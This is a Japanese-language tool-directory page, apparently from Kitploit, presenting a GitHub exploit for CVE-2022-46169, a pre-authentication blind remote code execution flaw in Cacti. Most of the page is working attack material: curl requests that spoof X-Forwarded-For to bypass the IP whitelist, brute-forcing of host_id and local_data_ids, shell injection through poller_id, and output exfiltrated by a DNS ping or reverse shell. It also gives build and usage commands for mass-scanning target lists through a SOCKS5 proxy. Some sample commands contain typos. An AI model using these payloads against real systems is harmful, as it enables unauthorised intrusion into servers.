Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-46169 — CVE-2022-46169 - Cacti ブラインドリモートコード実行 (事前認証なし) | Kitploit
ツール/GitHubGitHub/taythebot/cve-2022-46169
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubtaythebot/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 - Cacti ブラインドリモートコード実行 (事前認証なし)

リポジトリを見る
123年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-46169

Cacti ブラインドリモートコード実行(事前認証不要)

免責事項

これは教育目的のみです。私はあなたの行動に対して一切責任を負いません。自己責任で使用してください。

説明

このスクリプトは、この脆弱性を悪用するために必要な変数をブルートフォースします。このエクスプロイトには以下の3つの変数が必要です。

  • ホワイトリストに登録されたIPアドレス
  • 正しい host_id パラメータ
  • 正しい local_data_ids パラメータ

ファイル remote_agent.php はIPホワイトリストによって保護されています。X-Forwarded-IP ヘッダーでIPアドレスを偽装することでこれを回避できます。ほとんどのインスタンスでは 127.0.0.1 またはサーバー自身のIPアドレスがホワイトリストに登録されています。

次に、リクエストパラメータ host_id と local_data_ids をブルートフォースする必要があります。これは、デフォルトの最小値1、最大値10で整数のペア x,y を列挙することによって行われます。

リクエスト例

root@kitploit:~
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

悪用

これらの3つの変数を取得したら、poller_id キーにシェルコマンドを注入し、コマンドの前に ; を付けてエスケープできます。

これはブラインドRCEであるため、コマンドの出力を interact.sh のような場所に送信するか、リバースシェルを開く必要があります。poller_id の値はURLエンコードすることを忘れないでください!

以下は ping $(whoami).test.com コマンドを実行します。

root@kitploit:~
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

出力

スクリプトはCSV形式で出力します。ヘッダーは"target", "ip", "host_id", "data_id", "url"です。

url の値がない場合、スクリプトはIP制限をバイパスできたが、IDのブルートフォースに失敗したことを意味します。この出力を取得して、より高い最大値を設定して再試行できます。

出力の解析

以下のコマンドを使用して、出力ファイルをすばやく解析できます。

IP制限をバイパスしたターゲット

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f1 | sort -u

悪用可能なターゲット

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

ビルド

root@kitploit:~
go build -v -o bruteforce bruteforce.go

使い方

root@kitploit:~
./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • ターゲットはIPアドレスのリストでなければなりません。ポートは省略可能です。
  • Socks5プロキシに対応しています -proxy socks5://127.0.0.1:9050
  • デフォルトの出力ファイルは results.csv です。
ツールをダウンロード